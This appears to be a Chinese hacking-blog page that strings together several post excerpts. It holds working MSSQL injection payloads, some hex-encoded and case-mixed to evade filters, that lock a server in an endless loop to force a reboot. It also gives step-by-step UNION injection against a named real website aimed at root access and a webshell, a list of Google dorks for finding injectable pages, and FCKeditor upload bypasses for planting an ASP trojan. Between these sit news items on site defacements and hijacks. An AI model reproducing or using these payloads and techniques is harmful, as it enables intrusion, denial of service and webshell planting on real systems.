让管理员帮你重启机器
有时候,我们通过数据库备份一个批处理到启动菜单后,希望服务器在下次重启时运行我们的批处理。可是我们等啊等,服务器就是不重启,怎么办? 让管理员帮我们重启一下吧。呵呵
以下注入代码让服务器停止响应,或响应很慢,要取得更好的效果,请丢到注入点后多执行几次。最终管理员会重新启动服务器。
数字型注入点:
;wHiLe 1<9 bEgIn select cHaR(0) eNd--
文本型注入点:
';wHiLe 1<9 bEgIn select cHaR(0) eNd--
或者以 Declare + EXEC 的方式来执行:
;dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--
';dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--
以上代码在数据库服务器上制造死循环导致服务器资源被耗尽进而拒绝服务。 管理员会帮你重启服务器。
注:以上代码具有攻击性,请谨慎使用。
注:其中的 select char(0) 可以改成 select power(1.23456,100) 以加大计算量。
-----------------夹烟占位--------------------
;wHiLe 1<9 bEgIn select cHaR(0) eNd--
这句的意思是当1小9开始将0这个反转ASCII码。因为是恒成立的所以是个死循环。一直到机器资源用尽
改字符大小是为了绕过网站的过滤防注入。
;declare @s varchar(8000) set @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 exec(@s)--
declare @s varchar(8000)定义@s为varchar型长度8000。将"wHiLe 1<9 bEgIn select cHaR(0) eNd"用HEX编码后符值给@s,再用exec执行。。
作用同样是绕过网站的过滤防注入
';wHiLe 1<9 bEgIn select cHaR(0) eNd--
加'因为他是字符型注入。反正我是解说不清楚了。
select power(1.23456,100)返回1.23456的100次方根,不死才怪呢
concat函数就是将里边的字符区别大小的的串联起来,benchmark(9999999999999,md5('test')报告客户端的运行经过时间。盲注时也许有用。
我不知道concat函数对攻击起什么作用? w hex编码0x77 benchmark(9999999999999,md5(0x77) 这样也许能绕过防注入
乱写一气大牛见笑
----------------------------------------------------------------------------------------------------
死循环之ping增强版
来源:色萝卜's bolg
建议在虚拟机上试验
或者在别人的电脑上运行改批处理
她可以让她的电脑立马无法响应过来
而不得不重启机器 Read the rest of this entry
# 鬼仔:我刚看到的时候还没恢复,我也截了张图,比文中清楚些,点 这里 查看。
http://www.zone-h.org/mirror/id/8858514
补充一下:
服务器名称: ns1.apnihost.net
登记人: mr.lonely420.hotmail.com (mr@lonely420.hotmail.com)
再次补充:
用"google.co.ma ns1.apnihost.net"做关键字搜了下,找到以下两个链接
http://www.nowhereelse.fr/google-maroc-hacker-19697/
http://www.pleazik.com/google_hacked.html
====================以下信息来自cnBeta=======================
来源:cnBeta
突发消息,Google摩洛哥分站被黑!黑客在其首页上留下了地址和联系方式,并注明"Cyber-Criminal Was Here"(网络犯罪就在这里)的口号,并提供了组织的链接。具体原因迄今不详 Read the rest of this entry
Tags:
新闻, Google, 入侵, 摩洛哥.
文章作者:Flyh4t[脚本安全小组]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
本文已经发表在《黑客手册》,转载请署名版权某日在群里聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。
看注射点,老规矩,先提交个单引号,返回如图1
错误提示是
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
这个提示是很有玄机的,可以看到单引号没有转意,也就是说安全模式没有打开,这为我们后文得到webshell提供了机会。
下面猜字段吧,体力活的说
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,3,4
很轻松的猜出是四个字段。然后还是按部就班的看用户和权限
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,3,version()
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,3,user()
Oh yeah!!是mysql5的root权限,看到这里我觉得服务器拿下应该问题不大了。
和mssql、oracle、db2等数据库一样,mysql5提供了一个系统数据库:information_schema
在这个数据库里我们可以得到很多信息,包括当前用户权限、当前用户权限下可以访问的数据库、表、列名,因此在sql注射中,导致直接暴区数据库,表列名,再也不要‘暴力'咯):
开始操作,提交
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME%20%20from%20information_schema.STATISTICS/*
貌似没有出现想象中的效果
Read the rest of this entry
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id= Read the rest of this entry
北京时间12月4日消息,据国外媒体报道,黑客控制了电子支付服务供应商CheckFree的域名系统,并将该网站的访问者指向其自有的服务器。
域名注册机构NetworkSolutions新闻发言人苏珊·韦德(SusanWade)称,上述事件发生在美国东部时间周二中午12点30分左右,当时一些人登录CheckFree的NetworkSolutions账户后,修改了域名系统设置。她补充说,"一些人控制了用户登录信息,但我不知道他们是如何进入的。"
报道称,黑客在修改域名系统设置后,可以将访问者指向其自有的服务器,不过韦德表示,CheckFree在周三上午5点左右重新控制了账户,并且修复了设置。CheckFree发表声明称,周二上午10点10分前,黑客"将非CheckFree站点隔离开来,导致用户无法连接",在激活后,他们又在用户的电脑上装入了恶意软件。
CheckFree称,此次犯罪分子攻击的目标是AdobeAcrobat和AdobeReader的漏洞。CheckFree建议用户下载杀毒软件,并将AdobeReader升级至最新版本。
转自:http://www.hackbase.com/news/2008-12-05/21055.html
一,这个就是cn牛跟至尊版发现的那个.
asp/connector.asp
http://[target]/[path]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
上传文件地址是UserFiles/all/1.asa
"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
type=xxx
所传的文件就到了http://[target]/[path]/UserFiles/xxx/下了
type=../
所传文件就到网站跟目录了.
二.
asp/connector.asp
http://[target]/[path]/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
将找到的地址复制到IE地址栏中打开,出现一个上传文件管理页面,此时我们就可以上传我们的asp木马了,不过在上传之前我们需要将asp木马的后缀名改为asa,因为FCKeditor限制了asp文件的上传.
Read the rest of this entry